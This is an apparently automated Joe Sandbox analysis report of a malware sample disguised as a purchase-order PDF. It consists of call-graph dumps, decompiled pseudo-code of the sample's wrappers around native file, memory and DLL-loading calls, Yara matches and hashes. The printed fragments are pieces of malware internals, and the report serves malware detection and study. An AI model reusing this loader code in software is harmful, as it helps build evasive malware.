29363->29368 29374 41a5b0 29363->29374 29366 407f64 29364->29366 29367 41a5b0 2 API calls 29364->29367 29366->29021 29369 407f55 29367->29369 29368->29363 29369->29021 29371 408177 29370->29371 29372 41a5b0 2 API calls 29371->29372 29373 40817e 29372->29373 29373->28983 29375 41af50 LdrLoadDll 29374->29375 29376 41a5cc 29375->29376 29379 a62b60 LdrInitializeThunk 29376->29379 29377 41a5e3 29377->29363 29379->29377 29381 41b5b3 29380->29381 29384 40ace0 29381->29384 29385 40ad04 29384->29385 29386 409c4b 29385->29386 29387 40ad46 LdrLoadDll 29385->29387 29386->28991 29387->29386 29389 40b053 29388->29389 29391 40b0d0 29389->29391 29403 419c80 LdrLoadDll 29389->29403 29391->28996 29393 41af50 LdrLoadDll 29392->29393 29394 40f1ab 29393->29394 29394->28999 29395 41a7c0 29394->29395 29396 41a7df LookupPrivilegeValueW 29395->29396 29397 41af50 LdrLoadDll 29395->29397 29396->29001 29397->29396 29399 41af50 LdrLoadDll 29398->29399 29400 41a26c 29399->29400 29404 a62d90 LdrInitializeThunk 29400->29404 29401 41a28b 29401->29002 29403->29391 29404->29401 29406 40b1e0 29405->29406 29407 40b030 LdrLoadDll 29406->29407 29408 40b1f4 29407->29408 29408->28938 29410 40ae41 29409->29410 29411 40ae3d 29409->29411 29412 40ae5a 29410->29412 29413 40ae8c 29410->29413 29411->28941 29455 419cc0 LdrLoadDll 29412->29455 29456 419cc0 LdrLoadDll 29413->29456 29415 40ae9d 29415->28941 29417 40ae7c 29417->28941 29419 40f490 3 API calls 29418->29419 29420 4143b6 29418->29420 29419->29420 29420->28943 29457 4087a0 29421->29457 29424 408a9d 29424->28945 29425 4087a0 19 API calls 29426 408a8a 29425->29426 29426->29424 29475 40f700 10 API calls 29426->29475 29429 41af50 LdrLoadDll 29428->29429 29430 41a50c 29429->29430 29594 a62d70 LdrInitializeThunk 29430->29594 29431 40c312 29433 40f490 29431->29433 29434 40f4aa 29433->29434 29595 419fb0 29434->29595 29437 40f4f5 29437->28949 29438 41a000 2 API calls 29439 40f51e 29438->29439 29439->28949 29441 41af50 LdrLoadDll 29440->29441 29442 41a01c 29441->29442 29601 a62c00 LdrInitializeThunk 29442->29601 29443 40c375 29443->28955 29443->28958 29446 41af50 LdrLoadDll 29445->29446 29447 41a06c 29446->29447 29602 a62c20 LdrInitializeThunk 29447->29602 29448 40c449 29448->28966 29451 41af50 LdrLoadDll 29450->29451 29452 419e2c 29451->29452 29603 a62ea0 LdrInitializeThunk 29452->29603 29453 40c49c 29453->28970 29455->29417 29456->29415 29458 407ea0 4 API calls 29457->29458 29473 4087ba 29457->29473 29458->29473 29459 408a49 29459->29424 29459->29425 29460 408a3f 29461 408160 2 API calls 29460->29461 29461->29459 29464 419ef0 2 API calls 29464->29473 29466 41a480 LdrLoadDll NtClose 29466->29473 29469 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 29469->29473 29472 419e10 2 API calls 29472->29473 29473->29459 29473->29460 29473->29464 29473->29466 29473->29469 29473->29472 29476 419d00 29473->29476 29479 4085d0 29473->29479 29491 40f5e0 LdrLoadDll NtClose 29473->29491 29492 419d80 LdrLoadDll 29473->29492 29493 419db0 LdrLoadDll 29473->29493 29494 419e40 LdrLoadDll 29473->29494 29495 4083a0 29473->29495 29511 405f60 LdrLoadDll 29473->29511 29475->29424 29477 419d1c 29476->29477 29478 41af50 LdrLoadDll 29476->29478 29477->29473 29478->29477 29480 4085e6 29479->29480 29512 419870 29480->29512 29482 4085ff 29487 408771 29482->29487 29533 4081a0 29482->29533 29484 4086e5 29485 4083a0 11 API calls 29484->29485 29484->29487 29486 408713 29485->29486 29486->29487 29488 419ef0 2 API calls 29486->29488 29487->29473 29489 408748 29488->29489 29489->29487 29490 41a4f0 2 API calls 29489->29490 29490->29487 29491->29473 29492->29473 29493->29473 29494->29473 29496 4083c9 29495->29496 29573 408310 29496->29573 29499 41a4f0 2 API calls 29500 4083dc 29499->29500 29500->29499 29501 408467 29500->29501 29504 408462 29500->29504 29581 40f660 29500->29581 29501->29473 29502 41a480 2 API calls 29503 40849a 29502->29503 29503->29501 29505 419d00 LdrLoadDll 29503->29505 29504->29502 29506 4084ff 29505->29506 29506->29501 29585 419d40 29506->29585 29508 408563 29508->29501 29509 414a40 8 API calls 29508->29509 29510 4085b8 29509->29510 29510->29473 29511->29473 29513 41bf80 2 API calls 29512->29513 29514 419887 29513->29514 29540 409310 29514->29540 29516 4198a2 29517 4198e0 29516->29517 29518 4198c9 29516->29518 29521 41bd30 2 API calls 29517->29521 29519 41bdb0 2 API calls 29518->29519 29520 4198d6 29519->29520 29520->29482 29522 41991a 29521->29522 29523 41bd30 2 API calls 29522->29523 29524 419933 29523->29524 29530 419bd4 29524->29530 29546 41bd70 29524->29546 29527 419bc0 29528 41bdb0 2 API calls 29527->29528 29529 419bca 29528->29529 29529->29482 29531 41bdb0 2 API calls 29530->29531 29532 419c29 29531->29532 29532->29482 29534 40829f 29533->29534 29535 4081b5 29533->29535 29534->29484 29535->29534 29536 414a40 8 API calls 29535->29536 29537 408222 29536->29537 29538 41bdb0 2 API calls 29537->29538 29539 408249 29537->29539 29538->29539 29539->29484 29541 409335 29540->29541 29542 40ace0 LdrLoadDll 29541->29542 29543 409368 29542->29543 29545 40938d 29543->29545 29549 40cf10 29543->29549 29545->29516 29567 41a570 29546->29567 29550 40cf3c 29549->29550 29551 41a1d0 LdrLoadDll 29550->29551 29552 40cf55 29551->29552 29553 40cf5c 29552->29553 29560 41a210 29552->29560 29553->29545 29557 40cf97 29558 41a480 2 API calls 29557->29558 29559 40cfba 29558->29559 29559->29545 29561 41a22c 29560->29561 29562 41af50 LdrLoadDll 29560->29562 29566 a62b90 LdrInitializeThunk 29561->29566 29562->29561 29563 40cf7f 29563->29553 29565 41a800 LdrLoadDll 29563->29565 29565->29557 29566->29563 29568 41af50 LdrLoadDll 29567->29568 29569 41a58c 29568->29569 29572 a62e80 LdrInitializeThunk 29569->29572 29570 419bb9 29570->29527 29570->29530 29572->29570 29574 408328 29573->29574 29575 40ace0 LdrLoadDll 29574->29575 29576 408343 29575->29576 29577 414e40 LdrLoadDll 29576->29577 29578 408353 29577->29578 29579 40835c PostThreadMessageW 29578->29579 29580 408370 29578->29580 29579->29580 29580->29500 29582 40f673 29581->29582 29588 419e80 29582->29588 29586 41af50 LdrLoadDll 29585->29586 29587 419d5c 29586->29587 29587->29508 29589 419e9c 29588->29589 29590 41af50 LdrLoadDll 29588->29590 29593 a62cc0 LdrInitializeThunk 29589->29593 29590->29589 29591 40f69e 29591->29500 29593->29591 29594->29431 29596 419fcc 29595->29596 29597 41af50 LdrLoadDll 29595->29597 29600 a62e20 LdrInitializeThunk 29596->29600 29597->29596 29598 40f4ee 29598->29437 29598->29438 29600->29598 29601->29443 29602->29448 29603->29453 29604 a5e176 29605 a5e1ab 29604->29605 29606 a5e1bf GetPEB 29605->29606 29609 a5e2e2 29605->29609 29607 a5e1d3 29606->29607 29607->29609 29612 a629c0 LdrInitializeThunk 29607->29612 29610 a5e2d0 GetPEB 29610->29609 29611 a5e1fa 29611->29610 29612->29611 29613 ab316e 29614 ab31b4 29613->29614 29615 ab31bd GetPEB 29614->29615 29617 ab31cd 29614->29617 29615->29617 29616 ab346e 29618 ab31e2 GetPEB 29617->29618 29624 ab31f2 29617->29624 29618->29624 29619 ab3239 29621 ab324c GetPEB 29619->29621 29630 ab325b 29619->29630 29621->29630 29623 ab33eb 29627 ab3400 29623->29627 29645 a62a50 LdrInitializeThunk 29623->29645 29624->29616 29624->29619 29631 ab337e 29624->29631 29641 a62ed0 LdrInitializeThunk 29624->29641 29625 ab3278 29626 ab33af 29626->29619 29626->29625 29644 a62e20 LdrInitializeThunk 29626->29644 29627->29619 29646 a62c00 LdrInitializeThunk 29627->29646 29630->29625 29632 ab3269 GetPEB 29630->29632 29631->29616 29631->29619 29631->29626 29643 ab303a GetPEB GetPEB GetPEB GetPEB 29631->29643 29632->29625 29634 ab336a GetPEB 29634->29631 29635 ab343b 29647 a62a50 LdrInitializeThunk 29635->29647 29636 ab3334 29636->29631 29636->29634 29642 a62a50 LdrInitializeThunk 29636->29642 29639 ab3356 GetPEB 29640 a33b70 29639->29640 29640->29634 29641->29636 29642->29639 29643->29626 29644->29623 29645->29627 29646->29635 29647->29619 29648 a62ae0 LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 41a3fa-41a449 call 41af50 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !JA$bMA$bMA
                                            • API String ID: 2738559852-4222312340
                                            • Opcode ID: 2c8588b20b24e4b2187341ba4b4032ffef7b20e8c53d5e7ae378a0059d2b3bb7
                                            • Instruction ID: 28bdc840a14360ebbda241b8f69ab392724aee22cae486fb9bb772aba9465b91
                                            • Opcode Fuzzy Hash: 2c8588b20b24e4b2187341ba4b4032ffef7b20e8c53d5e7ae378a0059d2b3bb7
                                            • Instruction Fuzzy Hash: 15F0E2B2200108AFCB14DF99CC85EEB77A9AF8C354F158649BA1DE7241CA30E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 41a400-41a416 5 41a41c-41a449 NtReadFile 4->5 6 41a417 call 41af50 4->6 6->5
                                            C-Code - Quality: 37%
                                            			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                            				void* _t18;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t4 =  &_a40; // 0x414a21
                                            				_t6 =  &_a32; // 0x414d62
                                            				_t12 =  &_a8; // 0x414d62
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                            				return _t18;
                                            			}






                                            0x0041a403
                                            0x0041a40f
                                            0x0041a417
                                            0x0041a41c
                                            0x0041a422
                                            0x0041a43d
                                            0x0041a445
                                            0x0041a449

                                            APIs
                                            • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !JA$bMA$bMA
                                            • API String ID: 2738559852-4222312340
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 235 40ace0-40acfc 236 40ad04-40ad09 235->236 237 40acff call 41cc40 235->237 238 40ad0b-40ad0e 236->238 239 40ad0f-40ad1d call 41d060 236->239 237->236 242 40ad2d-40ad3e call 41b490 239->242 243 40ad1f-40ad2a call 41d2e0 239->243 249 40ad40-40ad54 LdrLoadDll 242->249 250 40ad57-40ad5a 242->250 243->242 249->250
                                            C-Code - Quality: 100%
                                            			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
                                            				char* _v8;
                                            				struct _EXCEPTION_RECORD _v12;
                                            				struct _OBJDIR_INFORMATION _v16;
                                            				char _v536;
                                            				void* _t15;
                                            				struct _OBJDIR_INFORMATION _t17;
                                            				struct _OBJDIR_INFORMATION _t18;
                                            				void* _t30;
                                            				void* _t31;
                                            				void* _t32;
                                            
                                            				_v8 =  &_v536;
                                            				_t15 = E0041CC40( &_v12, 0x104, _a8);
                                            				_t31 = _t30 + 0xc;
                                            				if(_t15 != 0) {
                                            					_t17 = E0041D060(__eflags, _v8);
                                            					_t32 = _t31 + 4;
                                            					__eflags = _t17;
                                            					if(_t17 != 0) {
                                            						E0041D2E0( &_v12, 0);
                                            						_t32 = _t32 + 8;
                                            					}
                                            					_t18 = E0041B490(_v8);
                                            					_v16 = _t18;
                                            					__eflags = _t18;
                                            					if(_t18 == 0) {
                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                            						return _v16;
                                            					}
                                            					return _t18;
                                            				} else {
                                            					return _t15;
                                            				}
                                            			}













                                            0x0040acfc
                                            0x0040acff
                                            0x0040ad04
                                            0x0040ad09
                                            0x0040ad13
                                            0x0040ad18
                                            0x0040ad1b
                                            0x0040ad1d
                                            0x0040ad25
                                            0x0040ad2a
                                            0x0040ad2a
                                            0x0040ad31
                                            0x0040ad39
                                            0x0040ad3c
                                            0x0040ad3e
                                            0x0040ad52
                                            0x00000000
                                            0x0040ad54
                                            0x0040ad5a
                                            0x0040ad0e
                                            0x0040ad0e
                                            0x0040ad0e

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 41a34a-41a34e 253 41a350-41a378 call 41af50 252->253 254 41a379-41a3a1 NtCreateFile 252->254 253->254
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 818b422ccb0000964566d4876d744815bf22fa1e8f54c71bbdefc3f6f336a5e1
                                            • Instruction ID: cf7193a71b00961e0141ea223290413cfb76118b5e48c92630641ef23e37ae04
                                            • Opcode Fuzzy Hash: 818b422ccb0000964566d4876d744815bf22fa1e8f54c71bbdefc3f6f336a5e1
                                            • Instruction Fuzzy Hash: 6701E4B2201209ABCB08CF88CC84EEB77ADAF8C754F058248BA1C97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 257 41a350-41a3a1 call 41af50 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 279 41a52a-41a56d call 41af50 NtAllocateVirtualMemory
                                            C-Code - Quality: 79%
                                            			E0041A52A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t16;
                                            				void* _t23;
                                            
                                            				asm("psllq mm0, [ebx-0x74aa1173]");
                                            				_t12 = _a4;
                                            				_t3 = _t12 + 0xc60; // 0xca0
                                            				E0041AF50(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t16;
                                            			}





                                            0x0041a52b
                                            0x0041a533
                                            0x0041a53f
                                            0x0041a547
                                            0x0041a569
                                            0x0041a56d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: abdeab3458a3dbef633e62a5ac37ab1a97033ba4cbeccd0945172c5857026075
                                            • Instruction ID: 7d27550bdcb24b2082353e2a18e0f7b5d120b3146cde2dc8be2183a3ca8ef098
                                            • Opcode Fuzzy Hash: abdeab3458a3dbef633e62a5ac37ab1a97033ba4cbeccd0945172c5857026075
                                            • Instruction Fuzzy Hash: 8AF01CB1210118AFDB14DF99CC85EEB77A9FF88354F158159FA1CE7241C634E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 282 41a530-41a546 283 41a54c-41a56d NtAllocateVirtualMemory 282->283 284 41a547 call 41af50 282->284 284->283
                                            C-Code - Quality: 100%
                                            			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				_t3 = _a4 + 0xc60; // 0xca0
                                            				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}





                                            0x0041a53f
                                            0x0041a547
                                            0x0041a569
                                            0x0041a56d

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0041A47A(void* __edx, signed int __esi, intOrPtr _a8, void* _a12) {
                                            				long _t9;
                                            				void* _t13;
                                            				signed int _t15;
                                            
                                            				_pop(es);
                                            				_t15 = __esi &  *(__edx + 0x555ac790);
                                            				_t6 = _a8;
                                            				_t3 = _t6 + 0x10; // 0x300
                                            				_push(_t15);
                                            				_t4 = _t6 + 0xc50; // 0x40a933
                                            				E0041AF50(_t13, _a8, _t4,  *_t3, 0, 0x2c);
                                            				_t9 = NtClose(_a12); // executed
                                            				return _t9;
                                            			}






                                            0x0041a47a
                                            0x0041a47b
                                            0x0041a483
                                            0x0041a486
                                            0x0041a489
                                            0x0041a48f
                                            0x0041a497
                                            0x0041a4a5
                                            0x0041a4a9

                                            APIs
                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 6d9e8884b500a25ec1b5bae155ff1940984e34dfa630c68516462ab8a61ce810
                                            • Instruction ID: 79537816c5b915e3fd35928aba6fa7cf3fef344b98ef69cddc457634b8b97058
                                            • Opcode Fuzzy Hash: 6d9e8884b500a25ec1b5bae155ff1940984e34dfa630c68516462ab8a61ce810
                                            • Instruction Fuzzy Hash: 7CE08C76600210ABD710EB94CC45EE77768EF48324F094099FE1C6B242C230FA008AD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A480(intOrPtr _a4, void* _a8) {
                                            				long _t8;
                                            				void* _t11;
                                            
                                            				_t5 = _a4;
                                            				_t2 = _t5 + 0x10; // 0x300
                                            				_t3 = _t5 + 0xc50; // 0x40a933
                                            				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                            				_t8 = NtClose(_a8); // executed
                                            				return _t8;
                                            			}





                                            0x0041a483
                                            0x0041a486
                                            0x0041a48f
                                            0x0041a497
                                            0x0041a4a5
                                            0x0041a4a9

                                            APIs
                                            • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3d96ecf6fbc9807dcb91923fca778aad4e4aea418462eca6bb42c7770c8a0e95
                                            • Instruction ID: 262d09853697b5974be883e86311f2aaa1372d81c54dc401064dc2e9c4228ed6
                                            • Opcode Fuzzy Hash: 3d96ecf6fbc9807dcb91923fca778aad4e4aea418462eca6bb42c7770c8a0e95
                                            • Instruction Fuzzy Hash: F390023125104413D21561584908707000D87D0382FA1C422A0865598DDA5A8952A122
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 62bec6f5f39ed37fb9855392ec95ec4755c46d61776f0d5c4f6289fe6a1901b0
                                            • Instruction ID: c58a916ac049da0b08c0632646f2beb446ab9d934fc9b0b4a551c778c90aeac2
                                            • Opcode Fuzzy Hash: 62bec6f5f39ed37fb9855392ec95ec4755c46d61776f0d5c4f6289fe6a1901b0
                                            • Instruction Fuzzy Hash: 82900221292081525649B1584808507400A97E03827A1C022A1855990CC92A9856D622
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9d2773d342058afb98ac1e53d33e7b72b2beafff8e6fae3137c437dd7832644d
                                            • Instruction ID: 95208c9815fa834e517dae4c727731e62ac7b2e85cba835ea93c5b91172b7ddb
                                            • Opcode Fuzzy Hash: 9d2773d342058afb98ac1e53d33e7b72b2beafff8e6fae3137c437dd7832644d
                                            • Instruction Fuzzy Hash: BB90022135104003D2447158581C6074009D7E1342F61D021E0855594CDD1988565223
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cf7c72e591372d9acebc874720158b168cd8f83085491b1817c084dde421417e
                                            • Instruction ID: 623ab8732427036cc8a40703d53f90e4386045ca223e8a08f7b557d77c994f92
                                            • Opcode Fuzzy Hash: cf7c72e591372d9acebc874720158b168cd8f83085491b1817c084dde421417e
                                            • Instruction Fuzzy Hash: 8F90022926304002D2847158580C60B000987D1343FA1D425A0456598CCD1988695322
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 70e3d1ae4841199edbe3daa64515305e3f85d3d5946df46153c3d074aa7288d6
                                            • Instruction ID: 2561abf2c16f0a24ebf54908566cc6946983130ad6cf5c1f4d53b54ad29a55b1
                                            • Opcode Fuzzy Hash: 70e3d1ae4841199edbe3daa64515305e3f85d3d5946df46153c3d074aa7288d6
                                            • Instruction Fuzzy Hash: 3090027125104402D24471584808747000987D0342F61C021A54A5594ECA5D8DD56666
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
